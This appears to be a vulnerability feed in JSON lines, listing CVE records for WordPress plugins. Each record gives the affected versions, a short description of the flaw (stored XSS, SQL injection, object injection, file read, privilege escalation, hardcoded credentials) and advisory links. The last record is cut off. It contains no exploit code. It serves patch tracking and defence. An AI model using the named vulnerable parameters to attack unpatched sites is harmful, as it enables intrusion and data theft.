{"CVE_ID":"CVE-2024-10693","slug":"skt-addons-for-elementor","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The SKT Addons for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.3 via the Unfold widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8accf552-f235-46dd-857b-330eef7765a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8accf552-f235-46dd-857b-330eef7765a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183804%40skt-addons-for-elementor&new=3183804%40skt-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183804%40skt-addons-for-elementor&new=3183804%40skt-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7599","slug":"advanced-sermons","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The Advanced Sermons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018sermon_video_embed\u2019 parameter in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41859e1c-1ae0-49f1-82d3-5af3c15994ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41859e1c-1ae0-49f1-82d3-5af3c15994ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/admin\\\/meta\\\/sermon-details.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/admin\\\/meta\\\/sermon-details.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147283\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0625","slug":"wpfront-notification-bar","versionImpact":"3.3.2","versionEndExcluding":"3.4","description":"The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wpfront-notification-bar-options[custom_class]\u2019 parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-notification-bar\\\/trunk\\\/templates\\\/template-wpfront-notification-bar.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-notification-bar\\\/trunk\\\/templates\\\/template-wpfront-notification-bar.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2500","slug":"go_pricing","versionEndExcluding":"3.4","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 3.3.19 via deserialization of untrusted input from the 'go_pricing' shortcode 'data' parameter. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7686b11-97a8-4f09-bbfa-d77120cc35b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7686b11-97a8-4f09-bbfa-d77120cc35b7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4950","slug":"funnelforms-free","versionEndExcluding":"3.4","description":"The Interactive Contact Form and Multi Step Form Builder WordPress plugin before 3.4 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73db1ee8-06a2-41b6-b287-44e25f5f2e58\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73db1ee8-06a2-41b6-b287-44e25f5f2e58\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6994","slug":"reveal-listing","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The Reveal Listing plugin by smartdatasoft for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.3. This is due to the plugin allowing users who are registering new accounts to set their own role or by supplying 'listing_user_role' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reveal-directory-listing-wordpress-theme\\\/27704330\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reveal-directory-listing-wordpress-theme\\\/27704330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd00d716-535c-41eb-a766-82079e0060e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd00d716-535c-41eb-a766-82079e0060e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4790","slug":"wp-google-my-business-auto-publish","versionEndExcluding":"3.4","description":"The WP Google My Business Auto Publish WordPress plugin before 3.4 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c01f9d36-955d-432c-8a09-ea9ee750f1a1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c01f9d36-955d-432c-8a09-ea9ee750f1a1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13344","slug":"scw-seat-reservation","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The Advance Seat Reservation Management for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'profileId' parameter in all versions up to, and including, 3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advance-seat-reservation-management-for-woocommerce\\\/19984266\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advance-seat-reservation-management-for-woocommerce\\\/19984266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35acdb85-e463-46b1-aea7-a6d4c3581499?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35acdb85-e463-46b1-aea7-a6d4c3581499?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6393","slug":"nextgen-gallery","versionImpact":"3.39.4","versionEndExcluding":"3.39.5","description":"The Photo Gallery, Sliders, Proofing and   WordPress plugin before 3.59.5 does not sanitise and escape some of its Images settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.39.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/126d1dd7-d332-47c8-ad25-5fbe211313b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/126d1dd7-d332-47c8-ad25-5fbe211313b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48328","slug":"nextgen-gallery","versionEndExcluding":"3.39","description":"Cross-Site Request Forgery (CSRF) vulnerability in Imagely WordPress Gallery Plugin \u2013 NextGEN Gallery allows Cross Site Request Forgery. This issue affects WordPress Gallery Plugin \u2013 NextGEN Gallery: from n\/a through 3.37.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-37-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-37-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3279","slug":"nextgen-gallery","versionImpact":"3.38","versionEndExcluding":"3.39","description":"The WordPress Gallery Plugin WordPress plugin before 3.39 does not validate some block attributes before using them to generate paths passed to include function\/s, allowing Admin users to perform LFI attacks","recommendation":"Update to version 3.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b7a7070-8d61-4ff8-b003-b4ff06221635\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b7a7070-8d61-4ff8-b003-b4ff06221635\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3155","slug":"nextgen-gallery","versionImpact":"3.37","versionEndExcluding":"3.39","description":"The WordPress Gallery Plugin WordPress plugin before 3.39 is vulnerable to Arbitrary File Read and Delete due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.","recommendation":"Update to version 3.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5c8473f4-4b52-430b-9140-b81b0a0901da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5c8473f4-4b52-430b-9140-b81b0a0901da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3154","slug":"nextgen-gallery","versionImpact":"3.38","versionEndExcluding":"3.39","description":"The WordPress Gallery Plugin WordPress plugin before 3.39 is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.","recommendation":"Update to version 3.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed099489-1db4-4b42-9f72-77de39c9e01e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed099489-1db4-4b42-9f72-77de39c9e01e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0627","slug":"simple-tags","versionImpact":"3.32.0","versionEndExcluding":"3.33.0","description":"The WordPress Tag, Category, and Taxonomy Manager  WordPress plugin before 3.30.0 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.33.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30fbe3c5-f190-48e8-a6bb-e8d78e001e7f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30fbe3c5-f190-48e8-a6bb-e8d78e001e7f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2793","slug":"atarim-visual-collaboration","versionImpact":"3.30","versionEndExcluding":"3.31","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to Stored Cross-Site Scripting via comments in all versions up to, and including, 3.30 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd63003-d1d6-480a-8df7-878bcc89f1ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd63003-d1d6-480a-8df7-878bcc89f1ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L505\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L505\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L1923\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L1923\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094999\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094999\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094260\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094260\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4566","slug":"elementor","versionImpact":"3.30.2","versionEndExcluding":"3.30.3","description":"The Elementor Website Builder \u2013 More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-text DOM element attribute in Text Path widget in all versions up to, and including, 3.30.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This attack affects only Chrome\/Edge browsers","recommendation":"Update to version 3.30.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332337%40elementor&new=3332337%40elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332337%40elementor&new=3332337%40elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af29ec92-5b07-4f57-a25f-19f3a894a193?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af29ec92-5b07-4f57-a25f-19f3a894a193?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8081","slug":"elementor","versionImpact":"3.30.2","versionEndExcluding":"3.30.3","description":"The Elementor plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.30.2 via the Import_Images::import() function due to insufficient controls on the filename specified. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.30.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/6af3551ee4213fb4003338743e22f41aa2a09c01\",\"name\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/6af3551ee4213fb4003338743e22f41aa2a09c01\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.30.2\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.30.2\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332233\\\/elementor\\\/trunk\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332233\\\/elementor\\\/trunk\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13929b51-b32e-401c-a642-49f7cd2d07bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13929b51-b32e-401c-a642-49f7cd2d07bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11895","slug":"paypal-payment-button-by-vcita","versionImpact":"3.20.0","versionEndExcluding":"3.30.0","description":"The Online Payments \u2013 Get Paid with PayPal, Square & Stripe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.20.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.30.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241650%40paypal-payment-button-by-vcita&new=3241650%40paypal-payment-button-by-vcita&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241650%40paypal-payment-button-by-vcita&new=3241650%40paypal-payment-button-by-vcita&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aab33299-f02d-44a1-9522-5309eed6fd38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aab33299-f02d-44a1-9522-5309eed6fd38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2038","slug":"atarim-visual-collaboration","versionImpact":"3.22.6","versionEndExcluding":"3.30","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 3.22.6. This is due to the use of hardcoded credentials to authenticate all the incoming API requests. This makes it possible for unauthenticated attackers to modify plugin settings, delete posts, modify post titles, and upload images.","recommendation":"Update to version 3.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29532f4d-e830-4c99-ad77-076eebbbe98d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29532f4d-e830-4c99-ad77-076eebbbe98d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/tags\\\/3.18\\\/inc\\\/wpf_api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/tags\\\/3.18\\\/inc\\\/wpf_api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3076514&old_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php&new=3090249&new_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3076514&old_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php&new=3090249&new_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6536","slug":"zephyr-project-manager","versionImpact":"3.3.97","versionEndExcluding":"3.3.99","description":"The Zephyr Project Manager WordPress plugin before 3.3.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors and admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.3.99, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee40c1c6-4186-4b97-866c-fb0e76cedeb8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee40c1c6-4186-4b97-866c-fb0e76cedeb8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10554","slug":"wp-advanced-search","versionImpact":"3.3.9.2","versionEndExcluding":"3.3.9.3","description":"The WordPress WP-Advanced-Search WordPress plugin before 3.3.9.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.3.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c15b082-caa5-4cf2-9986-2eb519dcb7c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c15b082-caa5-4cf2-9986-2eb519dcb7c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9796","slug":"wp-advanced-search","versionImpact":"3.3.9","versionEndExcluding":"3.3.9.2","description":"The WP-Advanced-Search WordPress plugin before 3.3.9.2 does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","recommendation":"Update to version 3.3.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37867","slug":"yet-another-stars-rating","versionEndExcluding":"3.3.9","description":"Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in YetAnotherStarsRating.Com YASR \u2013 Yet Another Star Rating Plugin for WordPress. This issue affects YASR \u2013 Yet Another Star Rating Plugin for WordPress: from n\/a through 3.3.8.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yet-another-stars-rating\\\/wordpress-yasr-yet-another-stars-rating-plugin-3-3-8-race-condition-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yet-another-stars-rating\\\/wordpress-yasr-yet-another-stars-rating-plugin-3-3-8-race-condition-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3942","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.3.8","versionEndExcluding":"3.3.9","description":"The MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on several functions in versions up to, and including, 3.3.8. This makes it possible for authenticated attackers, with subscriber level permissions and above, to read and modify content such as course questions, post titles, and taxonomies.","recommendation":"Update to version 3.3.9, or a newer patched 